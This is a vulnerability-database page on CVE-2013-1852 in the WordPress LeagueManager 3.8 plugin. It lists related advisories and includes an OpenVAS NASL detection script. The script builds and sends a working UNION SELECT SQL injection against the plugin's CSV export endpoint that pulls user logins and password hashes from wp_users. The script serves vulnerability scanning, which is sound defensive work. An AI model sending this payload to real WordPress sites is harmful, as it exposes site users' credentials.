Wordpress LeagueManager Plugin Multiple Vulnerabilities

Wordpress LeagueManager Plugin Multiple Vulnerabilities. Exploitation may lead to SQL injection, data manipulation, or disclosure

Reporter	Title	Published	Views	Family All 16
0day.today	WordPress LeagueManager Plugin 3.8 - SQL Injection	15 Mar 201300:00	–	zdt
0day.today	WordPress LeagueManager 3.8 SQL Injection Vulnerability	16 Mar 201300:00	–	zdt
CVE	CVE-2013-1852	5 Feb 201415:00	–	cve
Cvelist	CVE-2013-1852	5 Feb 201415:00	–	cvelist
Exploit DB	WordPress Plugin LeagueManager 3.8 - SQL Injection	15 Mar 201300:00	–	exploitdb
EUVD	EUVD-2013-1859	7 Oct 202500:30	–	euvd
exploitpack	WordPress Plugin LeagueManager 3.8 - SQL Injection	15 Mar 201300:00	–	exploitpack
NVD	CVE-2013-1852	5 Feb 201415:10	–	nvd
OpenVAS	WordPress LeagueManager Plugin Multiple Vulnerabilities	18 Mar 201300:00	–	openvas
Packet Storm	WordPress LeagueManager 3.8 SQL Injection	15 Mar 201300:00	–	packetstorm

Source	Link
exploitsdownload	www.exploitsdownload.com/exploit/na/wordpress-leaguemanager-38-sql-injection
cxsecurity	www.cxsecurity.com/issue/WLB-2013030138
mondounix	www.mondounix.com/wordpress-leaguemanager-3-8-sql-injection
1337day	www.1337day.com/exploit/20511

###############################################################################
# OpenVAS Vulnerability Test
# $Id: gb_wordpress_leaguemanager_plugin_mult_vuln.nasl 6125 2017-05-15 09:03:42Z teissa $
#
# Wordpress LeagueManager Plugin Multiple Vulnerabilities
#
# Authors:
# Thanga Prakash S <[email protected]>
#
# Copyright:
# Copyright (c) 2013 Greenbone Networks GmbH, http://www.greenbone.net
#
# This program is free software; you can redistribute it and/or modify
# it under the terms of the GNU General Public License version 2
# (or any later version), as published by the Free Software Foundation.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with this program; if not, write to the Free Software
# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.
###############################################################################

tag_impact = "Successful exploitation will allow remote attackers to inject or
manipulate SQL queries in the back-end database, allowing for the manipulation
or disclosure of arbitrary data.

Impact Level: Application";

tag_summary = "This host is installed with Wordpress LeagueManager Plugin and
is prone to multiple vulnerabilities.";

tag_solution = "Update to version 3.8.1 or later,
For updates refer to http://wordpress.org/support/plugin/leaguemanager";

tag_insight = "Multiple flaws due to,
- Input passed via the 'league_id' POST parameter to wp-admin/admin.php is
not properly sanitized before being returned to the user.
- Not sufficiently verify authorization when accessing the CSV export
functionality.";

tag_affected = "WordPress LeagueManager Plugin Version 3.8";

if(description)
{
  script_tag(name : "impact" , value : tag_impact);
  script_tag(name : "affected" , value : tag_affected);
  script_tag(name : "insight" , value : tag_insight);
  script_tag(name : "solution" , value : tag_solution);
  script_tag(name : "summary" , value : tag_summary);
  script_id(803439);
  script_version("$Revision: 6125 $");
  script_bugtraq_id(58503);
  script_cve_id("CVE-2013-1852");
  script_tag(name:"cvss_base", value:"7.5");
  script_tag(name:"cvss_base_vector", value:"AV:N/AC:L/Au:N/C:P/I:P/A:P");
  script_tag(name:"last_modification", value:"$Date: 2017-05-15 11:03:42 +0200 (Mon, 15 May 2017) $");
  script_tag(name:"creation_date", value:"2013-03-18 10:46:35 +0530 (Mon, 18 Mar 2013)");
  script_name("Wordpress LeagueManager Plugin Multiple Vulnerabilities");

  script_xref(name : "URL" , value : "http://1337day.com/exploit/20511");
  script_xref(name : "URL" , value : "http://cxsecurity.com/issue/WLB-2013030138");
  script_xref(name : "URL" , value : "http://www.mondounix.com/wordpress-leaguemanager-3-8-sql-injection");
  script_xref(name : "URL" , value : "http://exploitsdownload.com/exploit/na/wordpress-leaguemanager-38-sql-injection");

  script_category(ACT_ATTACK);
  script_tag(name:"qod_type", value:"remote_vul");
  script_copyright("Copyright (c) 2013 Greenbone Networks GmbH");
  script_family("Web application abuses");
  script_dependencies("secpod_wordpress_detect_900182.nasl");
  script_mandatory_keys("wordpress/installed");
  script_require_ports("Services/www", 80);
  exit(0);
}


include("http_func.inc");
include("http_keepalive.inc");
include("version_func.inc");

## Variable Initialization
url = "";
port = "";
sndReq = "";
rcvRes = "";
postData = "";

## Get HTTP Port
port = get_http_port(default:80);
if(!port){
  port = 80;
}

## Check the port status
if(!get_port_state(port)){
  exit(0);
}

## Check Host Supports PHP
if(!can_host_php(port:port)){
  exit(0);
}

## Get WordPress Location
if(!dir = get_dir_from_kb(port:port, app:"WordPress")){
  exit(0);
}

## Construct attack request
url = dir + "/wp-admin/admin.php?page=leaguemanager-export";
postData = "league_id=7 UNION SELECT ALL user_login,2,3,4,5,6,7,8,9,10,11,12,13,"+
           "user_pass,15,16,17,18,19,20,21,22,23,24 from wp_users--&mode=teams&"+
           "leaguemanager_export=Download+File";

sndReq = string("POST ", url, " HTTP/1.1\r\n",
                "Host: ", get_host_name(), "\r\n",
                "Content-Type: application/x-www-form-urlencoded\r\n",
                "Content-Length: ", strlen(postData), "\r\n",
                "\r\n", postData, "\r\n");

## Send request and receive the response
rcvRes = http_keepalive_send_recv(port:port, data:sndReq, bodyonly:TRUE);

## Confirm exploit worked by checking the response
if(rcvRes && rcvRes =~ 'Season.*Team.*Website.*Coach.*Home'){
  security_message(port);
}

15 May 2017 00:00Current

0.3Low risk

Vulners AI Score0.3

EPSS0.00815